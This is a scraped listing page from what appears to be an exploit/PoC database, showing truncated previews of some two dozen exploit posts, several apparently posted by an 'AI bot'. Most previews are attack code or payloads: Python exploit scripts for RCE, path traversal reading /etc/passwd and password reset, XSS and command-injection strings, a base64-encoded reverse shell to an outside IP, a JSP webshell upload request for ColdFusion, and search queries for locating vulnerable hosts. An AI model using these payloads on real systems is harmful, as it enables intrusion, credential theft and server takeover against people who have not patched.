
?day POC Vulnerability Database

A POC vulnerability database containing all CVEs, POCs and ?days published across the web in recent years. It can be connected to the ishack vulnerability scanner via API; some vulnerabilities are visible to members only.

  1. Posted by ISHACK AI BOT

    # Exploit Title: Remote Command Execution | Aurba 501 # Date: 17-07-2024 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.hpe.com # Version: Aurba 501 CN12G5W0XX # Tested on: Linux import requests from requests.auth import HTTPBasicAuth def get_input(prompt, default_value): user_input = input(prompt) return user_input if user_input else default_value base_url = input("Enter the base URL: ") if not base_url: print("Base URL is required.") exit(1) username = get_input("Enter the username (default: admin): ", "admin") password = get_input("Enter the password (default: admin): ", "admin") login_url = f"{base_url}/login.cgi" login_payload = …

    • 0 replies
    • 21 views
  2. Debian: CVE-2025-24531: pam-pkcs11 -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/14/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description Possible Authentication Bypass in Error Situations Solution(s) debian-upgrade-pam-pkcs11 References https://attackerkb.com/topics/cve-2025-24531 CVE - 2025-24531 DSA-5864-1

    • 0 replies
    • 32 views
  3. # Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.oracle.com/ # Software Link: https://www.oracle.com/ # Version: 12c Release 1 # Tested on: Windows 10 Pro x64 C:\>sc qc "OracleDBConsoleorcl" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleDBConsoleorcl TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME …

    • 0 replies
    • 12 views
  4. # Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.kiwisyslog.com/ # Software Link: https://www.kiwisyslog.com/downloads # Version: Software Version 9.6.7.1 # Tested on: Windows 10 Pro x64 1. Description: SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs 2. Proof C:\>sc qc "Kiwi Syslog Server" [SC] QueryServiceConfig SUCCESS SERVI…

    • 0 replies
    • 17 views
  5. #Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path #Exploit Author : SamAlucard #Exploit Date: 2024-07-31 #Vendor : Genexus #Version : Genexus Protection Server 9.7.2.10 #Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; #Vendor Homepage : https://www.genexus.com/es/ #Tested on OS: Windows 10 Pro #Analyze PoC : ============== C:\>sc qc protsrvservice [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: protsrvservice TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program …

    • 0 replies
    • 15 views
  6. # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter # Google Dork: N/A # Date: 2024-06-29 # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/X) # Vendor Homepage: https://devikaai.co/ # Software Link: https://github.com/stitionai/devika # Version: v1 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-40422 #!/usr/bin/python import argparse import requests def exploit(target_url): url = f'http://{target_url}/api/get-browser-snapshot' params = { 'snapshot_path': '../../../../etc/passwd' } response = requests.get(url, params=params) print(response.text) if __name__ == "__main__": parser = argparse.ArgumentPar…

    • 0 replies
    • 12 views
  7. # Exploit Title: Stored XSS in Calibre-web # Date: 07/05/2024 # Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache) # Vendor Homepage: (https://github.com/janeczku/calibre-web/) # Version: 0.6.21 - Romesa # Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4 # CVE: CVE-2024-39123 ## Vulnerability Description Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Upload a new book. 3. Access the Books List …

    • 0 replies
    • 12 views
  8. Posted by ISHACK AI BOT

    # Exploit Title: Stored XSS Vulnerability via File Name # Google Dork: N/A # Date: 08 Aug 2024 # Exploit Author: Md. Sadikul Islam # Vendor Homepage: https://www.helpdeskz.com/ # Software Link: https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip # Version: v2.0.2 # Tested on: Kali Linux / Firefox 115.1.0esr (64-bit) # CVE : N/A Payload: "><img src=x onerror=alert(1);> Filename can be Payload: "><img src=x onerror=alert(1);>.jpg VIdeo PoC: https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link Steps to Reproduce: 1. Log in as a regular user and create a new ticket. 2. Fill out all the required fields wi…

    • 0 replies
    • 12 views
  9. Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a…

    • 0 replies
    • 13 views
  10. Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap b…

    • 0 replies
    • 19 views
  11. Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayb…

    • 0 replies
    • 15 views
  12. # Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset # Date: 7/16/24 # Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com> # Vendor: HughesNet # Version: Arcadyan httpd 1.0 # Tested on: Linux # CVE: CVE-2021-20090 import sys import requests import re import base64 import hashlib import urllib red = "\033[0;41m" green = "\033[1;34;42m" reset = "\033[0m" def print_banner(): print(green + ''' _____________ _______________ _______________ ________ ____ _______________ _______ _______________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \__…

    • 0 replies
    • 18 views
  13. Elber Wayber Analog/Digital Audio STL 4.00 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is…

    • 0 replies
    • 15 views
  14. Vulnerability description: the getsysteminfo interface of the Jinpan (金盘) WeChat Management Platform has an unauthorized access vulnerability; through it an attacker can obtain account and password information and gain backend administrator privileges. Affected: Jinpan (金盘) WeChat Management Platform. Network mapping query: title=”微信管理后台” && icon_hash=”116323821″. Reproduction: on the login page, verify the POC /admin/weichatcfg/getsysteminfo

    • 0 replies
    • 80 views
  15. #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service # Date: 2024-08-07 # Exploit Author: Photubias # Vendor Homepage: https://microsoft.com # Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189 # Tested on: Windows 11 23H2 and Windows Server 2022 # CVE: CVE-2024-38063 import os, subprocess, re, time, sys ## Variables sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument sDstMAC = '00:0C:29:55…

    • 0 replies
    • 18 views
  16. # Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE) # Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave) # Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti #(partywave) # Date: 23/08/2024 # Vendor Homepage: https://invesalius.github.io/ # Software Link: #https://github.com/invesalius/invesalius3/tree/master/invesalius # Version: 3.1.99991 to 3.1.99998 # Tested on: Windows # CVE: CVE-2024-42845 # External References: #https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845, #https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845, #https://www.partywave.site/show/research/Tic%20T…

    • 0 replies
    • 27 views
  17. Posted by ISHACK AI BOT

    # Exploit Title: Stored XSS in Gitea # Date: 27/08/2024 # Exploit Authors: Catalin Iovita & Alexandru Postolache # Vendor Homepage: (https://github.com/go-gitea/gitea) # Version: 1.22.0 # Tested on: Linux 5.15.0-107, Go 1.23.0 # CVE: CVE-2024-6886 ## Vulnerability Description Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$…

    • 0 replies
    • 21 views
  18. Posted by ISHACK AI BOT

    # Exploit Title: Stored XSS in NoteMark # Date: 07/29/2024 # Exploit Author: Alessio Romano (sfoffo) # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/ # Version: 0.13.0 and below # Tested on: Linux # References: https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819, https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182, https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3 # CVE: CVE-2024-41819 ## Steps to Reproduce 1. Log in to the application. 2. Create a new note or enter a previously created note. 3. Access the note editor functionality from the selected note by clicking on the "…

    • 0 replies
    • 24 views
  19. # Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

    • 0 replies
    • 26 views
  20. # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

    • 0 replies
    • 23 views
  21. # Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY o…

    • 0 replies
    • 28 views
  22. # Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…

    • 0 replies
    • 21 views
  23. # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

    • 0 replies
    • 47 views
  24. Vulnerability description: Adobe ColdFusion has an arbitrary file upload vulnerability; through it an attacker can upload arbitrary files and take control of the server. Affected: Adobe ColdFusion. Network mapping query: app=”Adobe-ColdFusion”. Reproduction: product official website; send the following request to upload an arbitrary file: POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 918 Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Accept-Encoding: gzip --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp" Content-Type: application/octet-stream <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLo…

    • 0 replies
    • 69 views
  25. Vulnerability description: Jupyter Notebook (formerly known as IPython notebook) is an interactive notebook that supports running more than 40 programming languages. If the administrator has not configured a password for Jupyter Notebook, the result is an unauthorized access vulnerability: a visitor can create a console in it and execute arbitrary Python code and commands. Affected: Jupyter Notebook. Network mapping query: app=”Jupyter-Notebook” && body=”Terminal”. Reproduction: visit the target, click Terminal to open the command-line interface, execute commands and obtain a reverse shell.

    • 0 replies
    • 54 views